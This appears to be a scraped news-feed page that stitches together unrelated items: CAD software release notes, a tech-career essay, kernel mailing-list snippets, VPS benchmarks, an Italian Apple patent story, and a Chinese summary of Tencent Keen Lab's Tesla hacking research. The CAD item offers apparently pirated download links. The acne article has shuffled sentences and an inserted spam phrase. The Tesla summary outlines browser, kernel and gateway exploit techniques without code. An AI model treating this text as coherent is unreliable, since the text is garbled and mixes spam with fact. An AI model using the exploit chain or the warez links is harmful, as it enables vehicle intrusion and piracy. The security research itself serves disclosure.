Flexible workflow between desktop and mobile
With a built-in Online Module in ZWCAD+, now you can save your drawings and customized configuration to third-party cloud services, such as Dropbox, Google Drive and more. ZWCAD+ also provides a mobile solution, ZWCAD Touch for portable devices, which lets you work freely on your desktop and on the go.
ZWCAD+ 2015 Release Features:
- Big upgrade to ZWCAD+'s kernel enables all design information to be easily and accurately exchanged between different languages.
- A neater, flatter and more intuitive user interface, lets you get rid of long-time design visual fatigue as well as visual interruption.
- Simply draft a cross section and path or different cross sections in different positions, and you can get a 3D model without any lag.
- ZWCAD+ can now directly import graphic snapshots from Google Earth. This new feature allows you to view your final design on a current map.
- Reference Manager helps manage all external resource referred with ease. Super Hatch extends traditional Hatch function by enabling hatching with block, reference and image etc.
- For large projects that require tons of annotations. Flip Dimension Arrow makes cluttered annotations easier to navigate to assist you to quickly spot the note you need.
- For designers who use 32 system, turn on the 3GB switch will allocate more memory to ZWCAD+. which means ZWCAD+ can work more fluently with the new feature, especially with large drawings.
- For users who were previously frustrated by the inability to print raster images like BMP and JPEG. The newly added BMP/JPEG Descriptionters will end that.
What's new in ZWCAD+ 2015 SP2.1
http://www.zwsoft.com/zwcad/what_is_new/#2015_sp2.1

Buy a premium  to download file with fast speed
thanks
Rapidgator.net
http://rapidgator.net/file/1125db1c9acc … 6.rar.html
alfafile.net
http://alfafile.net/file/5AE/frg65.ZWCA … .27086.rar
[/center]


          How Do You Start In The Tech Sector?      Cache   Translate Page   Web Page Cache   

How Do You Start In The Tech Sector?
Career

August 9th, 2018

The tech sector, if you know what you're doing, is easier than most fields to get started in. However, you do have to know what you're doing. In this post, I'm going to step through a series of ways to get started, in case you're not sure.

Sounds easy, right? Well, nothing worthwhile's easy. Now, to be fair, I don't mean " if you know what you're doing " in any patronising or condescending way.

What I mean is that, unlike say being a GP , dentist , civil engineer , corporate lawyer , Queen's Council (QC) , etc., you don't need to have years of formal training.

What’s more, you don’t need to be registered with an industry group/board before you're allowed to work. These can include the Institute of Chartered Accountants , the Queensland Law Society , or the Queensland Bar Association .

In IT, however, most people whom I've spoken to over the years care far more for what you can do, rather than what a piece of paper says you could do.

Let's Say You Want to Write Code
How Do You Start In The Tech Sector?

If you want to write code, then start by learning the basics of a software development language. I'm not going to get into a flame war about one language or another, whether one's better than another or not.

That's for people with too much time on their hands, and for people who are too emotionally invested in their language(s) of choice ― or dare I say, just a bit insecure.

There are a host of languages to choose from, readily available on the three major operating systems ( linux , macOS , and windows ). Some of the most common, where you'll find the most amount of help and documentation, are php , Perl , C/C++ , Java , Go , Ruby , python , Haskell , and Lisp . Grab yourself and editor, or an IDE, learn it inside out, and get started learning to write code.

I've linked to a host of excellent online resources for each at the end of the article.

For my part, I prefer any language borne out of C/C++. I've written code in Visual Basic and Cobol and didn't come away from either experience positively.

Once you've learned the basics, start contributing to an open source project! You don't need to be overly ambitious, so the project doesn't need to be a big one.

It could be a small library, such as VIM for Technical Writers that I maintain every so often. It could, however, be the Linux Kernel too, if that's your motivation and you are feeling particularly ambitious.

Regardless of what you choose, by contributing to these projects you'll learn far faster and better than you likely could in any other way. Why?

Because you're working on real projects and have the opportunity to be mentored by people who have years of hands-on experience. You'll get practical, guided experience, the kind you'd likely take years to acquire on your own.

They'll help teach you good habits, best practices, patterns, techniques, and so much more; things you'd likely take ages to hear about, let alone learn.

What's more, you'll become part of a living, breathing community where ― hopefully ― you're encouraged to grow and appreciate the responsibilities and requirements of what it takes to ship software.

But I'd Rather Be a Systems Administrator?
How Do You Start In The Tech Sector?

The same approach can be broadly applied. Here’s my suggestion. Install a copy of Linux , BSD , or Microsoft Windows on an old PC or laptop. As you're installing it, have a look around at the tools that are available for it

hint:open source provides a staggering amount of choice. #justsayin .

Get to know how it's administered, whether via GUI tools (and the Power Shell) on Windows, or via the various daemons and their configuration files and command-line tools on Linux and BSD.

Server administration's a pretty broad topic, so it's hard ― if not downright impossible ― to suggest a specific set of tools to learn. I'm encouraging you at this point to get a broad understanding.

Later, if you're keen, you can specialise in a particular area. However, for now, get a broad understanding of:

Networking User and Group Management Installation Options and Tooling Service/Daemon configuration; and Disk Management.

Whether you're on Linux, BSD, or Windows, I've linked to a host of resources at the bottom of the article to help get you started.

Now that you've learned the fundamentals do something where people can critique you and hold you accountable, such as hosting a website of your own, through a provider such as Digital Ocean , or Linode .

The web server you use, whether Apache , NGINX , Lighttpd , or IIS doesn't matter. Just use one that works well on your OS of choice.

Once you've got it up and running, start building on the day to day tasks required to keep it up and running nicely. Once you've grown some confidence, move on to learning how to improve the site's security and performance, and deployment process.

This can include:

Optimising the web server, filesystem, and operating system configuration setting for maximum throughput Setting up an intrusion detection system (IDS); and Dockerising your site To Go Open Source or Microsoft?

By now you've got a pretty good set of knowledge. However, stop for just a moment, because it's time to figure out if you're going to specialise in open source (Linux/UNIX/BSD) or whether you're going to focus around Microsoft's tools and technologies.

You can become knowledgeable in both, and most developers and systems administrators that I know do have a broad range of knowledge in both. However, I'd suggest that it's easier to build your knowledge in one rather than attempting to learn both.

Depending on the operating system you've been using up until now, it's likely that you've already made your choice. However, it's good to stop and deliberately think about it.

What Do You Do Next?

Now, let's get back to building your skills. What do you do next? If you want to be a sys admin, start look around for opportunities to help others with their hosting needs.

Don't go all in ― yet . There's no need to rush. Keep stepping up gradually , building your confidence and skills.

If you're not sure of who might need help, have a think about:

What clubs are you involved in? Do you have friends with small businesses that might need support? Do you know others who want to learn what you have and need a mentor? I'm sure that as you start thinking, you'll be able to uncover other ideas and possibilities. Now you have to get out of your comfort zone, contact people and ask them if they need help.

Worst case scenario, they say no. Whatever! Keep going until you find someone who does want help and is willing to take you on.

Regardless of the path that you take, you should feel pretty confident in your foundational skills, because they're based on practical experience.

So, it's time to push further. To do that, I'd suggest contacting a University, a bank, or an insurance provider, if you want to cut your teeth on big installations.

Sure, many other places have big server installations. However, these three are the first that come to mind.

If you are focused on software development, here are a few suggestions:

Contact software development companies (avoid " digital agencies ") and see if they’re hiring. Talk to your local chamber of commerce and industry and let them know you’re around and what you do. Find the local business networking groups and go to the networking breakfasts. Get involved in your local user groups (this goes for sys admins too, btw). Start a user group if there isn’t one for what you want to focus on. In Conclusion

I could go on and on. The key takeaway I'm trying to leave you with is that, if you have practical experience , you'll increase the likelihood of gaining employment.

Any employer I've had of any worth values hands-on experience over a piece of paper any day.

Don't get me wrong; there's nothing wrong with degrees or industry certifications. And for complete transparency:

I have a Bachelor of Information Technology I'm LPIC-1 certified; and I’m a Zend (PHP 5) Engineer

However, university qualifications and industry certifications should only reinforce what you already know, and not be something that is used to get your start.

With all that said, I want to encourage you to go down the Open Source path, not Microsoft. But I’m biased, as I’ve been using Linux since 1999.

Regardless, have a chew on all that, and let me know what you think in the comments. I hope that, if you’re keen to get into IT, that this helps you do so, and clears up one or more questions and doubts that you may have.

Further Reading Open Source
          pth-order inverse of the Volterra series for multiple-input multiple-output non-linear dynamic systems      Cache   Translate Page   Web Page Cache   
A method to determine the pth-order inverse of the Volterra series of multiple-input multiple-output non-linear dynamic systems is presented; it combines time- and frequency-domain techniques to determine the Volterra series of the inverse as a function of the forward system's Volterra series. The method can be used for continuous and discrete time systems. Each operator of non-linear order n of the inverse is a function of the forward system's operators of non-linear order n and lower. It is shown that the pth-order post-inverse is equal to the pth-order preinverse. For the special case that there are no linear cross terms and that the linear memory effects are negligible the kernels of the forward and inverse models are approximately the same. In an example, an approximate inverse model of a model of a concurrent dual band radio frequency amplifier is derived.
          Reboots      Cache   Translate Page   Web Page Cache   
     This weekend starting early Saturday morning on August 11th, 2018, (shortly after Midnight) I will be rebooting most of the servers for kernel updates.  The 4.15.0 kernel seems to be particularly problematic although for us it’s not been problematic … Continue reading
          ?So this means that food does not cause acne.      Cache   Translate Page   Web Page Cache   

Improper Diet can cause acne.

?So this means that food does not cause acne.  Washing should not be done more than twice a day.  Male or female, American, Chinese or Puerto Rican, they all have gotten it at some points of their lives and may even still have it.  Though a proper and healthy diet is always good for our system, eating like a pig won't make pimples a permanent resident in your face. Wrong, wrong, wrong!  It is true that dirt and dust is unsightly to the face and washing the face is the way to eradicate them but washing often can actually irritate the skin more. Nobody is spared from having it.  So what is this little bundle of horror?  What else but the dreaded pimple!

A pimple, or acne as some people calls it, is a dreaded red, swollen bump in the face.Lets Dispel Some Acne Myths

It is the bane of a person's existence.  And once you have it, prepare to be tormented, embarrassed and humiliated.  Only severe stress treated by the doctor MAY cause acne to erupt only as a side effect of the drugs a person may be taking. But scientific studies have not discovered any connection between these two.  More than twice is enough to strip the face of its natural oils making it dry.  Everybody gets it; everybody hates it.  Many believed that acne is caused by dirt and dust in the face and by washing your face two-three even four times a day or even by scrubbing your face hard can prevent acne.

Acne Myth Number 1

Acne is caused by not washing your face often and not scrubbing it hard enough. Acne commonly occurs in the neck, face, back, shoulders and chest because the sebaceous glands filter press Manufacturers are most abundant in these locations.  It is like a universal language; it is like a right of passage in a person's life. Also, scrubbing can cause inflammations.

Acne Myth Number 3

When you're stressed acne tends to pop on your face like popcorn pops from a kernel.  Acne is a result of the hormones action on the skin's oil glands (the sebaceous gland) which leads to clogged pores and outbreak of lesions like pimples, blemishes or acne.  Stress is a part of our daily lives and believe it or not it is not a contributing factor to the acne residing in your face.  But the important question we should be asking to be able to avoid this dreaded "disease" is, "What causes this pain in the neck called acne?"

Unfortunately, the causes of acne cannot really be determined (unless your parents or their parents are acne infested too then there's a big, big chance you'll be called acne face by your peers and classmates) thus the acne myths are born!  These myths claim to be the cause of acne. Such a small bump, so much at stake.  We shall enumerate them here.  Not true.  Washing the face should be done as gently as possible with the gentlest facial scrub. So feel free to eat your favourite Lay's, French fries and chocolates anytime.  Certain foods that are oily like French fries and junk food can cause acne to erupt in our face.  If this is the case, consult your doctor immediately.


          Re: [PATCH v3] resource: Merge resources on a node when hot-adding ...      Cache   Translate Page   Web Page Cache   
Rashmica Gupta writes: (Summary) wrote:
What is the end-user impact of this patch?
Only architectures/setups that allow the user to remove and add memory of different sizes or different start addresses from the kernel at runtime will potentially encounter the resource fragmentation. Most memory hotplug/hotremove seems to be block or section based, and always adds and removes memory at the same place. Memtrace on ppc is different in that given a size (aligned to a block size), it scans each node and finds a chunk of memory of that size that we can offline and then removes it.
          Re: [PATCH 4/4] drm/meson: convert to the new canvas module      Cache   Translate Page   Web Page Cache   
Maxime Jourdan writes: 2018-08-10 0:41 GMT+02:00 Rob Herring <robh@kernel.org>: Documentation/devicetree/bindings/submitting-patches.txt. Hi, What's the standard procedure here ? The reason I kept devicetree+drm changes together is because I didn't want to have floating commits that would break the drm module.
floating commits that would break the drm module.
Should I split the changes anyway ?
Should I split the changes anyway ?
Maxime
Maxime
Maxime

          Re: [PATCH 2/3] perf report: Add raw report support for s390 auxil ...      Cache   Translate Page   Web Page Cache   
Michael Ellerman writes: Arnaldo Carvalho de Melo <acme@kernel.org> writes: Thanks for checking!
Yep all building OK here too.
Yep all building OK here too.
Thanks all.
Thanks all.
cheers
cheers
cheers

          [PATCH] sched/fair : fix typos      Cache   Translate Page   Web Page Cache   
Peng Hao writes: (Summary) 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c index 2f0a0be..b7ab23d 100644 --- a/kernel/sched/fair.c +++ b/kernel/sched/fair.c @@ -3315,7 +3315,7 @@ static inline void cfs_se_util_change(struct sched_avg *avg) * * XXX collapse load_sum and runnable_load_sum * - * cfq_rs: + * cfs_rq: * * load_sum = \Sum se_weight(se) * se->avg.load_sum * load_avg = \Sum se->avg.load_avg -- 1.8.3.1

          Re: [PATCH] perf tools: Check for null when copying nsinfo.      Cache   Translate Page   Web Page Cache   
Namhyung Kim writes: Hello,
Hello,
On Thu, Aug 09, 2018 at 11:53:48PM +0200, Benno Evers wrote: just return NULL for this case as well.
Acked-by: Namhyung Kim <namhyung@kernel.org>
Acked-by: Namhyung Kim <namhyung@kernel.org>
It seems you missed the Signed-off-by though.
It seems you missed the Signed-off-by though.
Thanks,
Namhyung
Namhyung
Namhyung
2.17.1
2.17.1

          Kernel Updates for Oracle Linux      Cache   Translate Page   Web Page Cache   
The following Linux Kernel updates has been released for Oracle Linux: ELBA-2018-4192 : Oracle Linux 6 Unbreakable Enterprise kernel bug fix update ELBA-2018-4192 : Oracle Linux 7 Unbreakable Enterprise kernel bug fix update ELSA-2018-4193 Important: Oracle Linux 6 Unbreakable Enterprise kernel security update ELSA-2018-4193 Important: Oracle Linux 7 Unbreakable Enterprise kernel security update...
          5-run 5th too much for Clinton to overcome      Cache   Translate Page   Web Page Cache   
A Eugene Helder home run was not enough for the Clinton LumberKings who fell to the Cedar Rapids Kernels 9-4 on Thursday night at Ashford University Field. The loss is the fifth straight for the LumberKings against the Kernels this season.
          Apple ha registrato un brevetto per usare l’iPhone come passaporto      Cache   Translate Page   Web Page Cache   

Passaporto

Apple ha registrato un brevetto per l'importazione di documenti importanti nel Secure Enclave, il coprocessore integrato nei SoC di ultima generazione che protegge l'integrità del sistema codificando e preservando i dati anche quando i kernel viene compromesso.

L'idea di Apple è consentire l'uso di iPhone (e forse anche Apple Watch) come sistema di riconoscimento formale alla stregua di un passaporto. Del brevetto riferisce il sito Appleworld.today. La Casa di Cupertino spiega che molti governi ora prevedono vari documenti di riconoscimento in grado di memorizzare informazioni di identificazione utilizzabili per effettuare l'autenticazione. Il passaporto elettronico, ad esempio, contiene un microchip posto all’interno della copertina. Il microchip rende possibile l’identificazione univoca del viaggiatore (nome, cognome, data di nascita e altri dettagli) mediante un semplice passaggio del documento sopra un lettore ottico.

Esibendo il passaporto, l'addetto alla dogana può identificare l'utente passando il documento su un lettore ottico. Dopo il confronto delle informazioni con quelle memorizzate internamente, il doganiere può confermare l'identità del titolare e consentire di superare la dogana.

Brevetto passaporto iPhone

Apple ritiene che questo procedimento può essere semplificato con l'iPhone sfruttando un sistema di comunicazione a corto raggio che trasmette dettagli memorizzati nel Secure Enclave. Il brevetto prevede vari metodi di trasmissione dei dati che potrebbero sostituire il documento di riconoscimento identificando univocamente il cittadino, meccanismi semplici, veloci e sicuri che permetterebbero di abbattere i tempi di attesa quando siamo in viaggio.

Come sempre, ricordiamo che Apple deposita annualmente centinaia di brevetti presso il Patent & Trademark Office e non sempre questi diventano prodotti e servizi che si concreteranno realmente.

- Click qui per l'articolo originale con commenti >> Apple ha registrato un brevetto per usare l’iPhone come passaporto


          Linux vulnerability could lead to DDoS attacks      Cache   Translate Page   Web Page Cache   
A Linux kernel vulnerability affecting version 4.9 and up could allow an attacker to carry out denial-of-service attacks on a system with an available open port, according to a 6 August security advisory.
          The Ricci Curvature for Noncommutative Three Tori      Cache   Translate Page   Web Page Cache   
arXiv:1808.02977

by: Dong, Rui
Abstract:
We compute the Ricci curvature of a curved noncommutative three torus. The computation is done both for conformal and non-conformal perturbations of the flat metric. To perturb the flat metric, the standard volume form on the noncommutative three torus is perturbed and the corresponding perturbed Laplacian is analyzed. Using Connes' pseudodifferential calculus for the noncommutative tori, we explicitly compute the second term of the short time heat kernel expansion for the perturbed Laplacians on functions and on 1-forms. The Ricci curvature is defined by localizing heat traces suitably. Equivalerntly, it can be defined through special values of localized spectral zeta functions. We also compute the scalar curvatures and compare our results with previous calculations in the conformal case. Finally we compute the classical limit of our formulas and show that they coincide with classical formulas in the commutative case.
          I Rarely Identify With Asians on Screen, but Here's Why Crazy Rich Asians Is So Important      Cache   Translate Page   Web Page Cache   

Lately, I've been telling my Asian friends that I'm going to see Crazy Rich Asians for the representation. I say it wryly, but there's a kernel of sincerity in what I'm saying.

I should start out by saying that Hollywood's numbers do make me emotional - mostly frustrated with the past and excited about the future. And before you ask, I'm at best mediocre at math. But the statistics are astounding, obvious to anyone who looks at them. Crazy Rich Asians is the first major American studio project to feature a predominantly Asian cast in 25 years, following the footsteps of 1993's The Joy Luck Club. Here's another crazy showbiz data point: in 2016, three percent of film roles went to Asian actors, while 78 percent went to white actors. As someone who grew up in a predominantly Asian and Latino neighborhood, the demographics of my community looked like those numbers - but reversed. So Crazy Rich Asians is, well, a crazy huge deal.

"I'm sure that my white friends don't worry about seeing their lived experiences represented in the lavishness of The Princess Diaries."

Many of my Asian friends are ambivalent about the representation hullabaloo around Crazy Rich Asians, and I feel them. I worry that the surface pleasures of representation overshadow other Asian American issues, like mental health and immigration. I also fear that the movie won't directly speak to my California upbringing in a working-class ethnoburb, given that it's about a professor who finds out that her hot boyfriend is a member of Singapore's elite. And then I get anxious about overthinking this, because I'm sure that my white friends don't worry about seeing their lived experiences represented in the lavishness of The Princess Diaries.

Truth be told, I haven't identified with most Asians in film and TV, not Rose Tico from The Last Jedi or even Cristina Yang from Grey's Anatomy. The only Asian character that I've truly resonated with is Diane Nguyen from Bojack Horseman. She's a bookish, introverted feminist who goes through bouts of depression and social anxiety as she navigates her relationships. She's also voiced by Alison Brie, a white actress, who I have otherwise loved. Problematic, I know, which brings me back to why representation is so important.

Opportunities in TV and film are important because they translate into financial and social capital. For Asians in Hollywood, this means that they receive a concrete paycheck for their work and are able to build industry clout. We'll get to see Constance Wu playing other parts and Jon M. Chu directing more features. And, hopefully, more representation will open the doors for not only East Asians, but also Southeast and South Asians in American entertainment. Creative work receives skepticism in general, but it's almost unspoken of when you grow up a first-generation Asian in this country. My parents, Vietnamese immigrants, discouraged me from pursuing the arts when I was younger. They weren't tiger parents, though. They worried that the world would cheat me because I wasn't white.

Representation also matters for character development and transcending stereotypes. In Crazy Rich Asians, Rachel, Peik Lin, and Eleanor are distinct people who aren't passive peasant girls or dragon ladies. Low bar, I know. Still, it's great that there's more than just one Asian female character. None of the actresses portraying them have to carry the weight of stereotypes or expectations of Western audiences in their performances.

"While I'm not going to connect with every Asian woman in movies, it's a huge deal when you grow up knowing one Asian American actress: Lucy Liu."

The last point that I want to make about representation, perhaps the most superficial one, is that I can't help but feel excited about seeing Asian women in American movies that I actually want to watch, not just projects about ninjas and geishas. When I was younger, my mom and I bonded over watching Sandra Bullock and Meg Ryan romantic comedies on VHS. It's overwhelming to see someone who looks and sounds like me in the leading role. While I'm not going to connect with every Asian woman in movies, it's a huge deal when you grow up knowing one Asian American actress: Lucy Liu.

Wu, who plays the protagonist in Crazy Rich Asians, recently penned an eloquent, heartfelt tweet that resonated with me deeply. She wrote, "I hope that Asian American kids watch CRA and realize that they can be the heroes of their own stories." Her simple message is such a beautiful testament to self-validation. But at the same time, Asians don't need to be heroes. I think that Crazy Rich Asians shows that the presence of Asians in American films can be normal, not just a punchline or a walking stereotype. And that's powerful.


          Docker Container and Vagrant / Virtualbox 101s      Cache   Translate Page   Web Page Cache   

files/images/flask.JPG

Tony Hirst, OUseful Info, Aug 09, 2018


Icon

This is a very useful article if you're just getting started with virtualization. Tony Hirst starts with a very simple example, specifically, a Python application called Flask, which is in essence a very simple web server. He then provides a Dockerfile which describes the server environment Flask needs to run. Simple. Stepping it up a notch, he then demonstrates how to set up an API server where the API is defined in a Jupyter notebook and published using the Jupyter Kernel Gateway to again run on Docker. Oy, not so simple (and doesn't seem to work on Zeit). Finally, he shows how to run the Flask demo using another virtualization application, Vagrant, which (it's worth noting) is a lot more complicated. In any case, these can then be run on cloud provisioners - Digital Ocean seems to be the flavour of the month.

Web: [Direct Link] [This Post]


          Reddit: Debian or Ubuntu for stability      Cache   Translate Page   Web Page Cache   

Hello!

I'm quite new to the Linux world, but have decided to base my new homeserver on Linux, as I'm fed up with Microsoft "quality" updates the last year or so.

I decided to use Debian as I understand this is somewhat more stable than Ubuntu. But then I discovered that I need to run Linux kernel 4.15 for my coffee lake cpu to work optimally (need vaapi).

Will the stability lead of Debian be lost when kernel upgrades are taken into account, and should I just run Ubuntu 18.04 that is born with Linux 4.15? Or will backported Debian kernels + packages still be a more stable setup than Ubuntu server?

submitted by /u/hatwerk
[link] [comments]
          Linux Kernel Expectations For AMD Threadripper 2      Cache   Translate Page   Web Page Cache   
Phoronix: Linux Kernel Expectations For AMD Threadripper 2 If you have already pre-ordered your AMD Threadripper 2990WX processor or just planning...
          systemd.link file does not change ethernet adapter name      Cache   Translate Page   Web Page Cache   
Ubuntu 18.04.1, server version kernel: 4.15.18 built from git://kernel.ubuntu.com/ubuntu/ubuntu-bionic.git, with i915 disabled due to hardware problems with the SOC (https://bugs.freedesktop.org/show_bug.cgi?id=106721) Latest updates installed I'm attempting to set up a predictable device name...
          HostBRZ OpenVZ 8GB Benchmark      Cache   Translate Page   Web Page Cache   

I recently ordered the VPS-LEB-8GB plan from HostBRZ which can be found at https://lowendbox.com/blog/hostbrz-vps-shared-reseller-hosting-from-2-year/ . Since there aren't any benchmarks around, here is a benchmark below of the VPS if anyone is interested. The only problem seems to be the slow SSD speed..

-------------------------------------------------
 nench.sh v2018.04.14 -- https://git.io/nench.sh
 benchmark timestamp:    2018-08-09 15:17:31 UTC
-------------------------------------------------

Processor:    Intel(R) Xeon(R) CPU E31240 @ 3.30GHz
CPU cores:    4
Frequency:    3292.369 MHz
RAM:          8.0G
Swap:         8.0G
Kernel:       Linux 2.6.32-042stab132.1 x86_64

Disks:
Filesystem     Type      Size Inodes
/dev/simfs     simfs     150G    45M

CPU: SHA256-hashing 500 MB
    2.554 seconds
CPU: bzip2-compressing 500 MB
    7.417 seconds
CPU: AES-encrypting 500 MB
    4.197 seconds

ioping: seek rate
    min/avg/max/mdev = 113.4 us / 231.7 us / 10.2 ms / 506.8 us
ioping: sequential read speed
    generated 2.35 k requests in 5.00 s, 588.8 MiB, 470 iops, 117.7 MiB/s

dd: sequential write speed
    1st run:    193.60 MiB/s
    2nd run:    171.66 MiB/s
    3rd run:    190.73 MiB/s
    average:    185.33 MiB/s

IPv4 speedtests
    your IPv4:    172.245.93.xxxx

    Cachefly CDN:         86.51 MiB/s
    Leaseweb (NL):        8.48 MiB/s
    Softlayer DAL (US):   1.86 MiB/s
    Online.net (FR):      8.30 MiB/s
    OVH BHS (CA):         18.33 MiB/s

No IPv6 connectivity detected
-------------------------------------------------

          HostRush OpenVZ 8GB Benchmark      Cache   Translate Page   Web Page Cache   

Since there isn't any benchmark for HostRush, here's a benchmark below for their RushOvz6-SSD plan. I had this VPS for about a month now and I would totally recommend. Great performance and uptime.

-------------------------------------------------
 nench.sh v2018.04.14 -- https://git.io/nench.sh
 benchmark timestamp:    2018-08-09 15:33:14 UTC
-------------------------------------------------

Processor:    Intel(R) Xeon(R) CPU           X5680  @ 3.33GHz
CPU cores:    4
Frequency:    3324.843 MHz
RAM:          8.0G
Swap:         8.0G
Kernel:       Linux 2.6.32-042stab123.9 x86_64

Disks:
ploop12899p1     75G  HDD

CPU: SHA256-hashing 500 MB
    2.400 seconds
CPU: bzip2-compressing 500 MB
    CPU: AES-encrypting 500 MB
    1.215 seconds

ioping: seek rate
    min/avg/max/mdev = 33.9 us / 50.3 us / 23.4 ms / 96.5 us
ioping: sequential read speed
    generated 9.46 k requests in 5.00 s, 2.31 GiB, 1.89 k iops, 473.0 MiB/s

dd: sequential write speed
    1st run:    591.28 MiB/s
    2nd run:    739.10 MiB/s
    3rd run:    727.65 MiB/s
    average:    686.01 MiB/s

IPv4 speedtests
    your IPv4:    172.106.75.xxxx

    Cachefly CDN:         95.04 MiB/s
    Leaseweb (NL):        5.67 MiB/s
    Softlayer DAL (US):   2.27 MiB/s
    Online.net (FR):      4.08 MiB/s
    OVH BHS (CA):         14.00 MiB/s

No IPv6 connectivity detected
-------------------------------------------------

          Testing distributed systems in Go      Cache   Translate Page   Web Page Cache   
What is etcd etcd is a key-value store for the most critical data of distributed systems. Use cases include applications running on Container Linux by CoreOS, which enables automatic Linux kernel updates. CoreOS uses etcd to store semaphore values to make sure only subset of cluster are rebooting at any given time. Kubernetes uses etcd to store cluster states for service discovery and cluster management, and it uses watch API to monitor critical configuration changes.
          SuperStock Kernel V3.0.0 OREO [SM-G93XF / FD / K / L / S / W8]      Cache   Translate Page   Web Page Cache   
Samsung Galaxy S7 - Thèmes, mods et personnalisation
Statistiques : 2 Message || 30 Vues Dernier message par yoanf26
          Healthy Soul Food – How a Health Crisis is Being Averted by Wellness (Video)      Cache   Translate Page   Web Page Cache   
shrimp and grits
*In a recent sketch on SNL, two hosts of a gospel-themed cooking show cooked soul food while talking about people they know dying from heart disease and diabetes. It might come across as funny, but it holds a kernel of truth about soul food and its link to health issues. Soul food – it’s the […]

The post Healthy Soul Food – How a Health Crisis is Being Averted by Wellness (Video) appeared first on EURweb.


          Phoronix: Linux 4.19 Certainly Is Going To Be A Big Kernel      Cache   Translate Page   Web Page Cache   
At the end of July I outlined some of the changes queued for Linux 4.19 while since then several more notable additions have become aligned for this next kernel cycle following the one week delay of Linux 4.18...
          Software Engineer - VMware - Palo Alto, CA      Cache   Translate Page   Web Page Cache   
1 years of experience in Intel and AMD x86 based processor architecture. 1 years of experience in OS kernel internals, including memory management, resource...
From VMware - Wed, 25 Jul 2018 00:20:47 GMT - View all Palo Alto, CA jobs
          BlackHat 2018       Cache   Translate Page   Web Page Cache   

前言

OTA(Over-The-Air)是汽车行业智能网联变革的核心能力之一。在本届Black Hat USA 2018大会上,腾讯科恩实验室带来了去年对特斯拉具备的先进OTA功能相关的安全研究成果。本成果对于促进汽车行业安全稳定落地智能互联解决方案具有重大意义,同时本议题也是全球首次针对汽车先进驾驶辅助系统(ADAS,特斯拉相关系统名为:Autopolit)的信息安全研究成果披露。

页首配图议题概要

腾讯安全科恩实验室在2016年至2017年间,连续两年针对特斯拉Model S和Model X进行了攻击测试,其预设的场景是避免通过物理方式接触汽车进行远程攻击。在去年举办的Black Hat USA大会上,科恩实验室的研究人员介绍了2016年特斯拉公司对其研究成果的致谢中所包含的具体细节,并向与会者展示了一系列特斯拉汽车的安全漏洞,获得了与会者的好评。此外,借助灯光舞蹈秀的形式展示了利用2017年发现的另一批漏洞攻击的威力,但相关漏洞的细节并未公布。

今年,腾讯安全科恩实验室带来的议题将会深入介绍2017年彩蛋视频背后涉及到的技术细节。除了介绍特斯拉基于云端的空中升级(OTA)机制,并展示一些攻击链中开发的新技术外,该议题还将着重介绍测试过程中发现的多个严重的安全漏洞。

发言人合影发言人简介

刘令,腾讯科恩实验室研究员,专注于逆向工程、漏洞挖掘、漏洞研究等技术,多次参与特斯拉等汽车的安全研究。曾在QEMU和XEN中发现多个虚拟化漏洞,同时也是一名CTF爱好者。

刘令张文凯,腾讯科恩实验室研究员,多次参与特斯拉、宝马等汽车安全研究项目,主要负责汽车CAN网络和汽车固件分析工作,有丰富的嵌入式系统软件开发经验,熟悉ECU设计过程和汽车CAN网络结构。

张文凯杜岳峰,腾讯科恩实验室研究员,多次参与特斯拉汽车安全研究,对逆向工程和恶意软件分析领域有着浓厚的兴趣。

杜岳峰议题解析

在今年的Black Hat USA大会上,腾讯科恩实验室安全团队向大家介绍了2017年披露的攻击链中相关漏洞的细节,并展示如何使用这些漏洞完成灯光秀。此外,自动驾驶系统的安全性已经成为一个新的热点话题,团队还会向大家展示对特斯拉辅助驾驶模块(即Autopillot,也称APE)的安全研究成果。

最后,团队还介绍了特斯拉对相关漏洞的修复结果,再一次强调只有安全研究者、安全社区和设备厂商互相合作,才能有效的提高整体安全水平。

会场

漏洞详解

在去年,我们利用了两个Webkit中存在的漏洞,实现了浏览器中的任意代码执行。今年的情况和去年类似,整个攻击过程依然是从一个Webkit漏洞开始的。

攻击过程中涉及到的部分硬件单元和连接方式如下图所示:

硬件单元和连接方式CID上具有一个Webkit内核的浏览器。在报告漏洞时,该浏览器仍保持为534.34版。

该版本的Webkit内核中,存在一个UAF漏洞,下图即是该漏洞的PoC代码:

PoC代码这个漏洞存在于对SVGTransformList元素的操作过程中。

该元素内部存在多个SVGTransform实例,这些实例的SVGMatrix结构会存储在一个Vector里。当SVGTransformListInitializeclear方法被调用后,Vecotr被释放,但访问VectorMatrix的指针仍然存留。利用该UAF漏洞,经过精心的内存布局之后,即可借助ArrayStorageUint32Array等结构的特性实现对内存的任意读和任意写,并从而实现了浏览器中的代码执行。

操作过程

获取了浏览器的权限之后,下一步操作就是突破内核和其他安全防护措施对浏览器的限制,从而得到root shell。

2016年,我们是通过利用Linux内核中的一个漏洞实现了该目的。但在2017年,由于特斯拉修复了相当多的内核漏洞,我们不得不寻找新的漏洞。

在2017年的车机固件中,浏览器进程只能访问/dev/nvmap/dev/nvhost-ctrl两个文件,这两个文件都是用来与英伟达Tegra芯片进行通信的驱动接口。在和这两个接口相关的代码中,我们发现了一处漏洞,该漏洞可使我们从用户空间对内核空间的任意内存地址减1。

接口相关代码这一漏洞存在于NVMap驱动中,当处理命令NVMAP_IOC_PIN_MULT时,由于对用户提供的指针数组验证不当,当其中包含一个非法结构时,非法结构体的引用数会被减1,而这个引用数的指针是用户态可控的。这意味着,用户态可以对内核态的任意内存地址减1。利用这一漏洞,结合Kernel中的其他gadget,我们可以对内核空间中的任意地址进行读写操作。之后对相关的syscallAppArmor配置进行篡改,即可拥有root shell。

获得root shell

得到root shell后证明CID已被完全攻破,下一个目标则是网关。

2016年我们报告了网关上的一些设计缺陷,特斯拉在收到报告后对相关漏洞进行了修复,通过加入签名机制,对网关上的升级软件传输操作进行了限制,未签名的升级软件将不能被传输到网关上,因此理论上使用非物理攻击方法是无法传输篡改后的升级软件的。

但在对新软件进行安全审计的过程中,我们发现升级过程中存在行为不一致的问题。如下图所示,尽管网关的文件传输协议限制了直接传输升级软件的操作,名为“boot.img”的升级软件无法直接传输到网关上,但文件系统的重命名行为和文件传输协议的重命名行为不一致。文件系统会忽略目标文件名首部的空格,导致目标文件名“\x20boot.img”会被文件系统理解为“boot.img”,从而绕过了升级软件对文件名的检查。

文件系统

